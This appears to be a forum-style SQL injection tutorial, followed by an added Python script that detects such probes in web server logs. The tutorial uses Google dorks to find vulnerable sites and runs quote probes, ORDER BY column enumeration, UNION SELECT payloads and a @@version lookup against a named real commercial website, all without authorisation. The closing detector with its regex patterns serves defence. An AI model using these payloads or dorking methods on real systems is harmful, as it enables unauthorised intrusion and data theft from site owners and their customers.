Basic Union Based Injection
First off, we need a vulnerable website. Google is the best partner for finding vulnerable sites: we use a Google Dork, a search trick for finding the perfect match. Here we are going to use the “inurl:” command to find vulnerable websites.
[Examples of Google Dorks:]
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=sa
inurl:games.php?id=
inurl:page.php?file=
[How to use]
Copy one of the above commands, paste it into the Google search box, and hit Enter. You get a list of websites. We have to visit the websites one by one to check for the vulnerability.
Vulnerable Sites (With Syntax)
So after you have a vulnerable site, to test whether you can inject, add a ' to the end of the URL.
I'll be using this site:
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15
As you can see, it loads perfectly fine, with no error. Now to see if it's vulnerable, add a ' (single quote) to the end, so it should look like this.
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15'
Now you should get an error that looks like this.
Now that you have found a vulnerable site, you need to find the number of columns. You can do this with the "Order By" clause. We'll start by guessing at 1,2,3,4,5,6.
So take your URL, and remove the ' from the end of it.
Your link should now look like this:
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+1--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+2--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+3--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+4--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+5--
(no-error)
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+6--
(error)
As you can see, the page loads perfectly fine for 1 through 5, so you keep increasing the number until you get an error that says "Unknown column '(Column Count Here)' in 'order clause'". The error at 6 means the query has 5 columns.
It looks like this:
So my link looks like this now and loads perfectly fine.
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=15+order+by+5--
Finding Vulnerable Columns
So now that you got the number of columns, you're going to want to see which ones you can get data from. You do this by using the "Union+Select" or "Union+All+Select" Function. First, you add a - in front of your ID Number.
It should look like this:
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=-15
Or, instead, you can change the number to null, since the - only serves to make the original query return no rows.
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=null
Then you want to use the Union Select function, so you add
+union+select+(Column Count Here)--
So you add one number for each column.
My link now looks like this:
Code:
www.easystickersbanners.co.uk/banners.php?categoryid=-15+union+select+1,2,3,4,5--
Now the site looks like this, so we know that 1 is a vulnerable column.
Getting MySQL Version
First off, we want it to be 5 or more. If it was less than 5, you would use error-based injection (I won't cover that).
So pick one of your vulnerable columns, and replace it with either:
Code:
@@version or version()
I'm going to use column 1, so now my link looks like this:
Code:
http://www.easystickersbanners.co.uk/banners.php?categoryid=null+union+Select+@@Version,2,3,4,5--
OR
http://www.easystickersbanners.co.uk/banners.php?categoryid=null+union+Select+version(),2,3,4,5--
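From the defending side, every step above leaves a recognisable request in the web server's access log. The following is an added example, not code from the original post: a Python triage script that flags the quote probe, the ORDER BY column sweep, UNION SELECT and the version lookup. The log lines, client addresses and function names are constructed for illustration; only the banners.php?categoryid= parameter is taken from the post.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Heuristic signatures matched on the decoded query string (triage signals, not proof).
PATTERNS = {
    "quote_probe": re.compile(r"=[^&]*['\u2019]\s*$"),           # value ends in a quote
    "order_by_enum": re.compile(r"\border\s+by\s+(\d+)", re.I),  # ORDER BY <index>
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_probe": re.compile(r"@@version|\bversion\s*\(\s*\)", re.I),
}
# Minimal combined-log-format parser: captures client address and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def decoded_query(target):
    """Percent-decode the query string and turn '+' into spaces."""
    return unquote_plus(target.partition("?")[2])

def classify(target):
    """Return the sorted probe tags found in one request target."""
    return sorted(t for t, rx in PATTERNS.items() if rx.search(decoded_query(target)))

def scan(lines):
    """Per client: tags seen, ORDER BY indexes tried, and whether they form a sweep."""
    report = defaultdict(lambda: {"tags": set(), "order_by": [], "sweep": False})
    for ip, target in (m.groups() for m in map(LOG_RE.match, lines) if m):
        tags = classify(target)
        if not tags:
            continue
        entry = report[ip]
        entry["tags"].update(tags)
        entry["order_by"] += map(int, PATTERNS["order_by_enum"].findall(decoded_query(target)))
        entry["sweep"] = len(set(entry["order_by"])) >= 3  # three or more distinct indexes
    return dict(report)

def _line(ip, target):  # one constructed access-log line
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" 200 512'

SAMPLE_LOG = (  # constructed traffic with documentation-range addresses, not real log data
    [_line("198.51.100.7", "/banners.php?categoryid=15%27")]
    + [_line("198.51.100.7", f"/banners.php?categoryid=15+order+by+{n}--") for n in range(1, 7)]
    + [_line("198.51.100.7", "/banners.php?categoryid=-15+union+select+1,2,3,4,5--"),
       _line("198.51.100.7", "/banners.php?categoryid=null+union+Select+@@Version,2,3,4,5--"),
       _line("192.0.2.10", "/banners.php?categoryid=22")]
)

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG).items():
        print(ip, sorted(finding["tags"]), finding["order_by"], finding["sweep"])
```

A client that produces the sweep together with the union_select tag on the same parameter is a strong signal that the parameter reaches the SQL query unparameterised and needs fixing in the application code.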